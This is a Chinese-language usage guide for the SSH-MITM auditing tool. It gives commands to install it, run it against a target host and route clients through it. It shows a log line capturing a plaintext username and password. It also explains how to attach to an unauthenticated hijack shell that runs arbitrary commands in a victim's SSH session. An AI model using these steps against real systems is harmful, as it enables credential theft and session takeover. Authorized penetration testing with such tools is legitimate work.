SSH-MITM 安全审计工具使用指南

工具概述

SSH-MITM 是一款专为安全审计设计的中间人攻击(MITM)服务器工具，基于Python开发，主要用于拦截和分析SSH流量。该工具具有以下核心功能：

• 支持公钥认证拦截
• 会话劫持能力
• 文件篡改功能
• 凭证信息窃取

环境要求

• Python运行环境
• pip包管理工具
• 网络访问权限（能够拦截SSH流量）

安装步骤

1. 打开命令行终端
2. 执行以下安装命令：

pip install ssh-mitm

基本使用方法

启动MITM服务器

ssh-mitm --remote-host 192.168.0.x

(将192.168.0.x替换为目标服务器的实际IP地址)

客户端连接方法

客户端应连接到MITM服务器的10022端口：

ssh -p 10022 user@proxyserver

功能详解

凭证信息获取

当客户端连接时，工具会在日志中输出详细的认证信息，包括：

• 远程地址(Remote Address)
• 端口号(Port)
• 用户名(Username)
• 密码(Password)
• 密钥信息(Key)
• 代理信息(Agent)

示例日志输出：

2021-01-01 11:38:26,098 [INFO] Client connection established with parameters: 
Remote Address: 192.168.0.x 
Port: 22 
Username: user 
Password: supersecret 
Key: None
Agent: None

会话劫持功能

1. 当客户端成功连接后，SSH-MITM会自动开启一个新的服务器端口用于会话劫持
2. 劫持端口会在日志中显示，例如：

2021-01-01 11:42:43,699 [INFO] created injector shell on port 34463. connect with: ssh -p 34463 127.0.0.1

3. 使用任意SSH客户端连接劫持端口（无需认证）：

ssh -p 34463 127.0.0.1

4. 会话特性：

• 会话会通过最新响应信息自动更新
• 可以执行任意命令
• 命令执行结果会同时显示在劫持会话和原始会话中

安全注意事项

1. 该工具仅限用于合法授权的安全审计和渗透测试
2. 使用前必须获得相关方的明确授权
3. 不当使用可能违反法律法规
4. 建议在受控环境中使用

高级功能

1. 文件篡改：可拦截和修改传输的文件内容
2. 公钥拦截：能够捕获客户端使用的公钥认证信息
3. 会话记录：完整记录SSH会话活动

项目地址

原文未提供具体项目地址，建议通过Python包索引(pypi)或GitHub搜索"ssh-mitm"获取最新版本和文档。

使用建议

1. 在测试环境中充分验证工具功能后再用于实际审计
2. 结合其他网络嗅探工具增强审计能力
3. 审计完成后及时关闭MITM服务器
4. 妥善保管审计过程中获取的敏感信息